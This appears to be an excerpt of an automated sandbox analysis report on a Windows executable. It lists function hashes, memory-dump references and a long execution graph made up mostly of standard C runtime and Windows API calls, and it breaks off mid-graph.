                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                            • Opcode ID: 44e558db68bb898ed5fbc7006be173e092d29c5a4b4cccdf3f6450c1475e0ff3
                                                                                                                                                                                                                            • Instruction ID: 705a91dfcbe9fcdf46b89280abd40ad315a33f1b21cb9da116a45739f56c91ab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e558db68bb898ed5fbc7006be173e092d29c5a4b4cccdf3f6450c1475e0ff3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2821D032E0838182EB209B16E04426D77E5FF88B8CF654035DA8D83686DFBCE945C791
                                                                                                                                                                                                                            Function 00007FF60299EDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction ID: 3673b7a82775ae432b3f80559ef6666884ac70d95840435f2e1f94460cc91143
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab2e788c1bc0f847787c616a8c08cf964f32d6020ccc511d84717c528c58902
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B111932A18B8182EB61CF1AE5402697BE5FF88B98F684231DACD47765DF7CD5618B00
                                                                                                                                                                                                                            Function 00007FF6029AF4C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                            • Opcode ID: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction ID: 636880391f91f74f2499da15704166a7e936f03cf19eb8fe73e3cbdd05199b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71e49ca3b200e6a04db85a54903f48b53c7d65b48687c1238235c48323b161bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9018F61E1830286FB70AF62A46127E2BA0FF54B0CFB01135D64DC6A86DFADE504CB54

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:1.7%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                            Total number of Nodes:820
                                                                                                                                                                                                                            Total number of Limit Nodes:21
                                                                                                                                                                                                                            execution_graph 70604 7ffe0073ac30 GetLastError 70605 7ffe0073ac56 70604->70605 70610 7ffe0073ac81 70604->70610 70704 7ffe00743fa0 70605->70704 70606 7ffe0073e160 memcpy_s 32 API calls 70609 7ffe0076b44d 70606->70609 70612 7ffe0076b455 70609->70612 70613 7ffe0076b45e 70609->70613 70610->70606 70625 7ffe0073ac9a GetLastError 70610->70625 70611 7ffe0076b430 TlsGetValue 70611->70610 70727 7ffe0073a890 32 API calls 2 library calls 70612->70727 70728 7ffe00734fd8 6 API calls __vcrt_uninitialize_ptd 70613->70728 70616 7ffe0076b46c 70619 7ffe0076b473 70616->70619 70620 7ffe0076b47a 70616->70620 70617 7ffe0076b45c 70618 7ffe0076b48f SetLastError 70617->70618 70623 7ffe0073ad25 70618->70623 70729 7ffe0073a890 32 API calls 2 library calls 70619->70729 70730 7ffe00735040 32 API calls memcpy_s 70620->70730 70681 7ffe007998b0 70623->70681 70628 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70625->70628 70626 7ffe0076b47f 70731 7ffe0073a890 32 API calls 2 library calls 70626->70731 70627 7ffe0073ad2a 70632 7ffe0073afc0 70627->70632 70633 7ffe0073ad65 GetLastError 70627->70633 70630 7ffe0073acd2 70628->70630 70634 7ffe0076b49d TlsGetValue 70630->70634 70641 7ffe0073acde SetLastError SetLastError 70630->70641 70631 7ffe0076b486 70631->70618 70631->70625 70635 7ffe0073af96 ProcessCodePage 70632->70635 70638 7ffe0073b028 70632->70638 70642 7ffe0073afcd 70632->70642 70636 7ffe0073ad89 70633->70636 70637 7ffe0073adb2 70633->70637 70640 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70636->70640 70663 7ffe0073af2e GetLastError 70637->70663 70713 7ffe0073e160 70637->70713 70690 7ffe00769684 70638->70690 70644 7ffe0073ada6 70640->70644 70641->70623 70653 7ffe0073ad15 70641->70653 70642->70635 70650 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70642->70650 70644->70637 70648 7ffe0076f3c8 TlsGetValue 70644->70648 70646 7ffe0073adef 70651 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70646->70651 70647 7ffe0076f3d7 70735 7ffe0073a890 32 API calls 2 library calls 70647->70735 70648->70647 70654 7ffe0073affc 70650->70654 70655 7ffe0073ae14 70651->70655 70658 7ffe0076f392 TlsGetValue 70654->70658 70666 7ffe0073b008 70654->70666 70659 7ffe0073ae20 70655->70659 70660 7ffe0076f3e0 TlsSetValue 70655->70660 70656 7ffe0076f3de 70661 7ffe0076f3fa SetLastError 70656->70661 70657 7ffe0073b02d 70657->70635 70698 7ffe00735ac8 70657->70698 70658->70666 70665 7ffe0076f3f2 70659->70665 70677 7ffe0073ae39 70659->70677 70660->70665 70667 7ffe0076f408 TlsGetValue 70661->70667 70668 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70663->70668 70736 7ffe0073a890 32 API calls 2 library calls 70665->70736 70666->70635 70732 7ffe00734fd8 6 API calls __vcrt_uninitialize_ptd 70666->70732 70672 7ffe0073af5c 70668->70672 70672->70667 70674 7ffe0073af68 SetLastError SetLastError 70672->70674 70673 7ffe0076f3ad 70733 7ffe0073a720 40 API calls 3 library calls 70673->70733 70674->70635 70680 7ffe0073af19 70677->70680 70725 7ffe0073db20 EnterCriticalSection LeaveCriticalSection 70677->70725 70726 7ffe0073ddb0 32 API calls 2 library calls 70677->70726 70680->70661 70680->70663 70737 7ffe00798758 EnterCriticalSection 70681->70737 70683 7ffe007998d2 70684 7ffe007998e1 70683->70684 70740 7ffe00798980 100 API calls 2 library calls 70683->70740 70686 7ffe007998ea IsProcessorFeaturePresent 70684->70686 70687 7ffe0079990f ProcessCodePage 70684->70687 70688 7ffe007998f9 70686->70688 70687->70627 70741 7ffe00798160 6 API calls 2 library calls 70688->70741 70691 7ffe0076968d __vcrt_initialize_pure_virtual_call_handler 70690->70691 70748 7ffe007699fc 70691->70748 70695 7ffe007696a9 70697 7ffe007696a0 70695->70697 70755 7ffe00769a68 DeleteCriticalSection 70695->70755 70697->70657 70699 7ffe00735aeb 70698->70699 70700 7ffe00735b4a 70698->70700 70699->70700 70772 7ffe00735a80 EnterCriticalSection 70699->70772 70780 7ffe007356f0 7 API calls 2 library calls 70699->70780 70781 7ffe00735980 6 API calls 70699->70781 70700->70635 70734 7ffe007696c4 8 API calls 3 library calls 70700->70734 70705 7ffe0073ac75 70704->70705 70707 7ffe00743fe9 70704->70707 70705->70610 70705->70611 70706 7ffe00744093 LoadLibraryExW 70706->70707 70708 7ffe00775039 GetLastError 70706->70708 70707->70705 70707->70706 70709 7ffe00744042 GetProcAddress 70707->70709 70712 7ffe0077505a FreeLibrary 70707->70712 70708->70707 70710 7ffe00775044 LoadLibraryExW 70708->70710 70709->70705 70711 7ffe00744057 70709->70711 70710->70712 70711->70705 70712->70707 70714 7ffe0073e18a HeapAlloc 70713->70714 70716 7ffe0073e171 70713->70716 70715 7ffe0073addf 70714->70715 70719 7ffe007704e6 70714->70719 70715->70646 70715->70647 70716->70714 70718 7ffe0077051a 70716->70718 70808 7ffe0073a550 32 API calls 3 library calls 70718->70808 70719->70718 70723 7ffe007704fb HeapAlloc 70719->70723 70806 7ffe0076a420 8 API calls _handle_errorf 70719->70806 70807 7ffe0076a3d0 10 API calls __std_exception_copy 70719->70807 70722 7ffe0077051f 70723->70719 70724 7ffe00770515 70723->70724 70724->70718 70725->70677 70726->70677 70727->70617 70728->70616 70729->70617 70730->70626 70731->70631 70732->70673 70733->70635 70734->70635 70735->70656 70736->70661 70742 7ffe0073cab0 GetLastError 70737->70742 70739 7ffe00798794 LeaveCriticalSection 70739->70683 70740->70684 70741->70687 70743 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70742->70743 70744 7ffe0073caec 70743->70744 70745 7ffe0073caf8 SetLastError 70744->70745 70746 7ffe0076b4ba TlsGetValue 70744->70746 70745->70739 70749 7ffe00769a04 70748->70749 70751 7ffe00769a35 70749->70751 70752 7ffe0076969c 70749->70752 70756 7ffe00769e20 70749->70756 70761 7ffe00769a68 DeleteCriticalSection 70751->70761 70752->70697 70754 7ffe007697e4 8 API calls 2 library calls 70752->70754 70754->70695 70755->70697 70762 7ffe00769af8 70756->70762 70759 7ffe00769e78 InitializeCriticalSectionAndSpinCount 70760 7ffe00769e63 70759->70760 70760->70749 70761->70752 70763 7ffe00769b59 70762->70763 70767 7ffe00769b54 70762->70767 70763->70759 70763->70760 70764 7ffe00769c06 70764->70763 70766 7ffe00769c14 GetProcAddress 70764->70766 70765 7ffe00769b81 LoadLibraryExW 70765->70767 70768 7ffe00769ba2 GetLastError 70765->70768 70769 7ffe00769c25 70766->70769 70767->70763 70767->70764 70767->70765 70771 7ffe00769beb FreeLibrary 70767->70771 70768->70767 70770 7ffe00769bad LoadLibraryExW 70768->70770 70769->70763 70770->70767 70771->70767 70782 7ffe00734da0 70772->70782 70774 7ffe00735a9c 70775 7ffe00735aac LeaveCriticalSection 70774->70775 70793 7ffe00734e48 50 API calls 70774->70793 70775->70699 70777 7ffe00735aa5 70794 7ffe00734ea4 GetStdHandle GetFileType 70777->70794 70779 7ffe00735aaa 70779->70775 70780->70699 70781->70699 70783 7ffe0076d190 70782->70783 70784 7ffe00734dc3 EnterCriticalSection 70782->70784 70803 7ffe0073a550 32 API calls 3 library calls 70783->70803 70788 7ffe00734ddb 70784->70788 70786 7ffe00734e1a LeaveCriticalSection 70786->70774 70786->70783 70787 7ffe0076d195 70804 7ffe007984c0 45 API calls memcpy_s 70787->70804 70788->70786 70792 7ffe00734e15 70788->70792 70795 7ffe00735780 70788->70795 70791 7ffe0076d1a1 70792->70786 70793->70777 70794->70779 70796 7ffe0073e160 memcpy_s 32 API calls 70795->70796 70801 7ffe00735794 70796->70801 70798 7ffe0073585b 70798->70788 70799 7ffe00743fa0 __vcrt_uninitialize_ptd 5 API calls 70799->70801 70800 7ffe0076d318 InitializeCriticalSectionAndSpinCount 70801->70799 70801->70800 70802 7ffe0073583d 70801->70802 70805 7ffe0073a890 32 API calls 2 library calls 70802->70805 70803->70787 70804->70791 70805->70798 70806->70719 70807->70719 70808->70722 70809 7ff602992d00 70810 7ff602992d10 70809->70810 70811 7ff602992d61 70810->70811 70812 7ff602992d4b 70810->70812 70814 7ff602992d81 70811->70814 70825 7ff602992d97 __vcrt_freefls 70811->70825 70865 7ff6029925f0 53 API calls _log10_special 70812->70865 70866 7ff6029925f0 53 API calls _log10_special 70814->70866 70817 7ff602992d57 __vcrt_freefls 70867 7ff60299b5c0 70817->70867 70820 7ff602993069 70882 7ff6029925f0 53 API calls _log10_special 70820->70882 70823 7ff602993053 70881 7ff6029925f0 53 API calls _log10_special 70823->70881 70825->70817 70825->70820 70825->70823 70826 7ff60299302d 70825->70826 70828 7ff602992f27 70825->70828 70837 7ff602991440 70825->70837 70861 7ff602991bf0 70825->70861 70880 7ff6029925f0 53 API calls _log10_special 70826->70880 70829 7ff602992f93 70828->70829 70876 7ff6029a9284 37 API calls 2 library calls 70828->70876 70831 7ff602992fbe 70829->70831 70832 7ff602992fb0 70829->70832 70878 7ff602992af0 37 API calls 70831->70878 70877 7ff6029a9284 37 API calls 2 library calls 70832->70877 70835 7ff602992fbc 70879 7ff602992470 54 API calls __vcrt_freefls 70835->70879 70883 7ff602993f50 70837->70883 70840 7ff60299146b 70919 7ff6029925f0 53 API calls _log10_special 70840->70919 70841 7ff60299148c 70893 7ff60299f744 70841->70893 70844 7ff60299147b 70844->70825 70845 7ff6029914a1 70846 7ff6029914c1 70845->70846 70847 7ff6029914a5 70845->70847 70849 7ff6029914f1 70846->70849 70850 7ff6029914d1 70846->70850 70920 7ff602992760 53 API calls 2 library calls 70847->70920 70853 7ff6029914f7 70849->70853 70858 7ff60299150a 70849->70858 70921 7ff602992760 53 API calls 2 library calls 70850->70921 70897 7ff6029911f0 70853->70897 70854 7ff602991584 70854->70825 70856 7ff6029914bc __vcrt_freefls 70915 7ff60299f0bc 70856->70915 70858->70856 70859 7ff602991596 70858->70859 70922 7ff60299f40c 70858->70922 70925 7ff602992760 53 API calls 2 library calls 70859->70925 70862 7ff602991c15 70861->70862 71167 7ff6029a39f4 70862->71167 70865->70817 70866->70817 70868 7ff60299b5c9 70867->70868 70869 7ff602992f1a 70868->70869 70870 7ff60299b950 IsProcessorFeaturePresent 70868->70870 70871 7ff60299b968 70870->70871 71194 7ff60299bb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 70871->71194 70873 7ff60299b97b 71195 7ff60299b910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70873->71195 70876->70829 70877->70835 70878->70835 70879->70817 70880->70817 70881->70817 70882->70817 70884 7ff602993f5c 70883->70884 70926 7ff602998410 70884->70926 70886 7ff602993f84 70887 7ff602998410 2 API calls 70886->70887 70888 7ff602993f97 70887->70888 70931 7ff6029a4ff4 70888->70931 70891 7ff60299b5c0 _log10_special 8 API calls 70892 7ff602991463 70891->70892 70892->70840 70892->70841 70894 7ff60299f774 70893->70894 71102 7ff60299f4d4 70894->71102 70896 7ff60299f78d 70896->70845 70898 7ff602991248 70897->70898 70899 7ff60299124f 70898->70899 70900 7ff602991277 70898->70900 71119 7ff6029925f0 53 API calls _log10_special 70899->71119 70903 7ff602991291 70900->70903 70904 7ff6029912ad 70900->70904 70902 7ff602991262 70902->70856 71120 7ff602992760 53 API calls 2 library calls 70903->71120 70906 7ff6029912bf 70904->70906 70914 7ff6029912db memcpy_s 70904->70914 71121 7ff602992760 53 API calls 2 library calls 70906->71121 70908 7ff60299f40c _fread_nolock 53 API calls 70908->70914 70909 7ff6029912a8 __vcrt_freefls 70909->70856 70910 7ff60299f180 37 API calls 70910->70914 70911 7ff60299139f 71122 7ff6029925f0 53 API calls _log10_special 70911->71122 70914->70908 70914->70909 70914->70910 70914->70911 71115 7ff60299fb4c 70914->71115 70916 7ff60299f0ec 70915->70916 71139 7ff60299ee98 70916->71139 70918 7ff60299f105 70918->70854 70919->70844 70920->70856 70921->70856 71151 7ff60299f42c 70922->71151 70925->70856 70927 7ff602998432 MultiByteToWideChar 70926->70927 70929 7ff602998456 70926->70929 70927->70929 70930 7ff60299846c __vcrt_freefls 70927->70930 70928 7ff602998473 MultiByteToWideChar 70928->70930 70929->70928 70929->70930 70930->70886 70932 7ff6029a4f28 70931->70932 70933 7ff6029a4f4e 70932->70933 70936 7ff6029a4f81 70932->70936 70962 7ff6029a4144 11 API calls _get_daylight 70933->70962 70935 7ff6029a4f53 70963 7ff6029a9760 37 API calls _invalid_parameter_noinfo 70935->70963 70938 7ff6029a4f94 70936->70938 70939 7ff6029a4f87 70936->70939 70950 7ff6029a9aa8 70938->70950 70964 7ff6029a4144 11 API calls _get_daylight 70939->70964 70943 7ff6029a4fb5 70957 7ff6029aed4c 70943->70957 70944 7ff6029a4fa8 70965 7ff6029a4144 11 API calls _get_daylight 70944->70965 70947 7ff6029a4fc8 70966 7ff6029a44d8 LeaveCriticalSection 70947->70966 70949 7ff602993fa6 70949->70891 70967 7ff6029af158 EnterCriticalSection 70950->70967 70952 7ff6029a9abf 70953 7ff6029a9b1c 19 API calls 70952->70953 70954 7ff6029a9aca 70953->70954 70955 7ff6029af1b8 _isindst LeaveCriticalSection 70954->70955 70956 7ff6029a4f9e 70955->70956 70956->70943 70956->70944 70968 7ff6029aea48 70957->70968 70960 7ff6029aeda6 70960->70947 70962->70935 70963->70949 70964->70949 70965->70949 70973 7ff6029aea83 __vcrt_InitializeCriticalSectionEx 70968->70973 70970 7ff6029aed21 70987 7ff6029a9760 37 API calls _invalid_parameter_noinfo 70970->70987 70972 7ff6029aec53 70972->70960 70980 7ff6029b5dbc 70972->70980 70973->70973 70978 7ff6029aec4a 70973->70978 70983 7ff6029b50d4 51 API calls 3 library calls 70973->70983 70975 7ff6029aecb5 70975->70978 70984 7ff6029b50d4 51 API calls 3 library calls 70975->70984 70977 7ff6029aecd4 70977->70978 70985 7ff6029b50d4 51 API calls 3 library calls 70977->70985 70978->70972 70986 7ff6029a4144 11 API calls _get_daylight 70978->70986 70988 7ff6029b53bc 70980->70988 70983->70975 70984->70977 70985->70978 70986->70970 70987->70972 70989 7ff6029b53f1 70988->70989 70990 7ff6029b53d3 70988->70990 70989->70990 70992 7ff6029b540d 70989->70992 71042 7ff6029a4144 11 API calls _get_daylight 70990->71042 70999 7ff6029b59cc 70992->70999 70993 7ff6029b53d8 71043 7ff6029a9760 37 API calls _invalid_parameter_noinfo 70993->71043 70997 7ff6029b53e4 70997->70960 71045 7ff6029b5700 70999->71045 71002 7ff6029b5a41 71076 7ff6029a4124 11 API calls _get_daylight 71002->71076 71003 7ff6029b5a59 71064 7ff6029a7398 71003->71064 71006 7ff6029b5a46 71077 7ff6029a4144 11 API calls _get_daylight 71006->71077 71015 7ff6029b5438 71015->70997 71044 7ff6029a7370 LeaveCriticalSection 71015->71044 71042->70993 71043->70997 71046 7ff6029b572c 71045->71046 71054 7ff6029b5746 71045->71054 71046->71054 71089 7ff6029a4144 11 API calls _get_daylight 71046->71089 71048 7ff6029b573b 71090 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71048->71090 71050 7ff6029b5815 71055 7ff6029b5872 71050->71055 71095 7ff6029a89f8 37 API calls 2 library calls 71050->71095 71051 7ff6029b57c4 71051->71050 71093 7ff6029a4144 11 API calls _get_daylight 71051->71093 71054->71051 71091 7ff6029a4144 11 API calls _get_daylight 71054->71091 71055->71002 71055->71003 71056 7ff6029b580a 71094 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71056->71094 71058 7ff6029b586e 71058->71055 71096 7ff6029a9780 IsProcessorFeaturePresent 71058->71096 71060 7ff6029b57b9 71092 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71060->71092 71101 7ff6029af158 EnterCriticalSection 71064->71101 71076->71006 71077->71015 71089->71048 71090->71054 71091->71060 71092->71051 71093->71056 71094->71050 71095->71058 71097 7ff6029a9793 71096->71097 71100 7ff6029a9494 14 API calls 3 library calls 71097->71100 71099 7ff6029a97ae GetCurrentProcess TerminateProcess 71100->71099 71103 7ff60299f53e 71102->71103 71104 7ff60299f4fe 71102->71104 71103->71104 71106 7ff60299f54a 71103->71106 71114 7ff6029a9694 37 API calls 2 library calls 71104->71114 71113 7ff6029a44cc EnterCriticalSection 71106->71113 71107 7ff60299f525 71107->70896 71109 7ff60299f54f 71110 7ff60299f658 71 API calls 71109->71110 71111 7ff60299f561 71110->71111 71112 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71111->71112 71112->71107 71114->71107 71116 7ff60299fb7c 71115->71116 71123 7ff60299f89c 71116->71123 71118 7ff60299fb9a 71118->70914 71119->70902 71120->70909 71121->70909 71122->70909 71124 7ff60299f8e9 71123->71124 71125 7ff60299f8bc 71123->71125 71124->71118 71125->71124 71126 7ff60299f8f1 71125->71126 71127 7ff60299f8c6 71125->71127 71130 7ff60299f7dc 71126->71130 71137 7ff6029a9694 37 API calls 2 library calls 71127->71137 71138 7ff6029a44cc EnterCriticalSection 71130->71138 71132 7ff60299f7f9 71133 7ff60299f81c 74 API calls 71132->71133 71134 7ff60299f802 71133->71134 71135 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71134->71135 71136 7ff60299f80d 71135->71136 71136->71124 71137->71124 71140 7ff60299eee1 71139->71140 71141 7ff60299eeb3 71139->71141 71148 7ff60299eed3 71140->71148 71149 7ff6029a44cc EnterCriticalSection 71140->71149 71150 7ff6029a9694 37 API calls 2 library calls 71141->71150 71144 7ff60299eef8 71145 7ff60299ef14 72 API calls 71144->71145 71146 7ff60299ef04 71145->71146 71147 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71146->71147 71147->71148 71148->70918 71150->71148 71152 7ff60299f456 71151->71152 71163 7ff60299f424 71151->71163 71153 7ff60299f4a2 71152->71153 71155 7ff60299f465 memcpy_s 71152->71155 71152->71163 71164 7ff6029a44cc EnterCriticalSection 71153->71164 71165 7ff6029a4144 11 API calls _get_daylight 71155->71165 71156 7ff60299f4aa 71158 7ff60299f1ac _fread_nolock 51 API calls 71156->71158 71160 7ff60299f4c1 71158->71160 71159 7ff60299f47a 71166 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71159->71166 71162 7ff6029a44d8 _fread_nolock LeaveCriticalSection 71160->71162 71162->71163 71163->70858 71165->71159 71166->71163 71169 7ff6029a3a4e 71167->71169 71168 7ff6029a3a73 71185 7ff6029a9694 37 API calls 2 library calls 71168->71185 71169->71168 71171 7ff6029a3aaf 71169->71171 71186 7ff6029a1c80 49 API calls _invalid_parameter_noinfo 71171->71186 71173 7ff6029a3b8c 71174 7ff6029a97c8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 71173->71174 71175 7ff6029a3a9d 71174->71175 71176 7ff60299b5c0 _log10_special 8 API calls 71175->71176 71178 7ff602991c38 71176->71178 71177 7ff6029a3b46 71177->71173 71179 7ff6029a3b61 71177->71179 71180 7ff6029a3bb0 71177->71180 71181 7ff6029a3b58 71177->71181 71178->70825 71187 7ff6029a97c8 71179->71187 71180->71173 71182 7ff6029a3bba 71180->71182 71181->71173 71181->71179 71184 7ff6029a97c8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 71182->71184 71184->71175 71185->71175 71186->71177 71188 7ff6029a97fc 71187->71188 71189 7ff6029a97cd HeapFree 71187->71189 71188->71175 71189->71188 71190 7ff6029a97e8 GetLastError 71189->71190 71191 7ff6029a97f5 Concurrency::details::SchedulerProxy::DeleteThis 71190->71191 71193 7ff6029a4144 11 API calls _get_daylight 71191->71193 71193->71188 71194->70873 71196 7ff6029a4688 71197 7ff6029a46bf 71196->71197 71198 7ff6029a46a2 71196->71198 71197->71198 71199 7ff6029a46d2 CreateFileW 71197->71199 71247 7ff6029a4124 11 API calls _get_daylight 71198->71247 71201 7ff6029a4706 71199->71201 71202 7ff6029a473c 71199->71202 71221 7ff6029a47dc GetFileType 71201->71221 71250 7ff6029a4c64 46 API calls 3 library calls 71202->71250 71203 7ff6029a46a7 71248 7ff6029a4144 11 API calls _get_daylight 71203->71248 71208 7ff6029a4741 71212 7ff6029a4770 71208->71212 71213 7ff6029a4745 71208->71213 71209 7ff6029a46af 71249 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71209->71249 71210 7ff6029a4731 CloseHandle 71215 7ff6029a46ba 71210->71215 71211 7ff6029a471b CloseHandle 71211->71215 71252 7ff6029a4a24 71212->71252 71251 7ff6029a40b8 11 API calls 2 library calls 71213->71251 71220 7ff6029a474f 71220->71215 71222 7ff6029a48e7 71221->71222 71225 7ff6029a482a 71221->71225 71223 7ff6029a48ef 71222->71223 71224 7ff6029a4911 71222->71224 71228 7ff6029a48f3 71223->71228 71229 7ff6029a4902 GetLastError 71223->71229 71231 7ff6029a48d2 71224->71231 71232 7ff6029a4934 PeekNamedPipe 71224->71232 71226 7ff6029a4856 GetFileInformationByHandle 71225->71226 71270 7ff6029a4b60 21 API calls _fread_nolock 71225->71270 71226->71229 71230 7ff6029a487f 71226->71230 71272 7ff6029a4144 11 API calls _get_daylight 71228->71272 71273 7ff6029a40b8 11 API calls 2 library calls 71229->71273 71235 7ff6029a4a24 51 API calls 71230->71235 71237 7ff60299b5c0 _log10_special 8 API calls 71231->71237 71232->71231 71233 7ff6029a4844 71233->71226 71233->71231 71238 7ff6029a488a 71235->71238 71239 7ff6029a4714 71237->71239 71263 7ff6029a4984 71238->71263 71239->71210 71239->71211 71242 7ff6029a4984 10 API calls 71243 7ff6029a48a9 71242->71243 71244 7ff6029a4984 10 API calls 71243->71244 71245 7ff6029a48ba 71244->71245 71245->71231 71271 7ff6029a4144 11 API calls _get_daylight 71245->71271 71247->71203 71248->71209 71249->71215 71250->71208 71251->71220 71254 7ff6029a4a4c 71252->71254 71253 7ff6029a477d 71262 7ff6029a4b60 21 API calls _fread_nolock 71253->71262 71254->71253 71274 7ff6029ae5a4 51 API calls 2 library calls 71254->71274 71256 7ff6029a4ae0 71256->71253 71275 7ff6029ae5a4 51 API calls 2 library calls 71256->71275 71258 7ff6029a4af3 71258->71253 71276 7ff6029ae5a4 51 API calls 2 library calls 71258->71276 71260 7ff6029a4b06 71260->71253 71277 7ff6029ae5a4 51 API calls 2 library calls 71260->71277 71262->71220 71264 7ff6029a49a0 71263->71264 71265 7ff6029a49ad FileTimeToSystemTime 71263->71265 71264->71265 71267 7ff6029a49a8 71264->71267 71266 7ff6029a49c1 SystemTimeToTzSpecificLocalTime 71265->71266 71265->71267 71266->71267 71268 7ff60299b5c0 _log10_special 8 API calls 71267->71268 71269 7ff6029a4899 71268->71269 71269->71242 71270->71233 71271->71231 71272->71231 71273->71231 71274->71256 71275->71258 71276->71260 71277->71253 71278 7ff6029ae80c 71279 7ff6029ae9fe 71278->71279 71281 7ff6029ae84e _isindst 71278->71281 71324 7ff6029a4144 11 API calls _get_daylight 71279->71324 71281->71279 71284 7ff6029ae8ce _isindst 71281->71284 71282 7ff60299b5c0 _log10_special 8 API calls 71283 7ff6029aea19 71282->71283 71299 7ff6029b5014 71284->71299 71289 7ff6029aea2a 71290 7ff6029a9780 _isindst 17 API calls 71289->71290 71292 7ff6029aea3e 71290->71292 71296 7ff6029ae92b 71298 7ff6029ae9ee 71296->71298 71323 7ff6029b5058 37 API calls _isindst 71296->71323 71298->71282 71300 7ff6029ae8ec 71299->71300 71301 7ff6029b5023 71299->71301 71305 7ff6029b4418 71300->71305 71325 7ff6029af158 EnterCriticalSection 71301->71325 71303 7ff6029b502b 71303->71300 71304 7ff6029b4e84 55 API calls 71303->71304 71304->71300 71306 7ff6029b4421 71305->71306 71307 7ff6029ae901 71305->71307 71326 7ff6029a4144 11 API calls _get_daylight 71306->71326 71307->71289 71311 7ff6029b4448 71307->71311 71309 7ff6029b4426 71327 7ff6029a9760 37 API calls _invalid_parameter_noinfo 71309->71327 71312 7ff6029b4451 71311->71312 71313 7ff6029ae912 71311->71313 71328 7ff6029a4144 11 API calls _get_daylight 71312->71328 71313->71289 71317 7ff6029b4478 71313->71317 71315 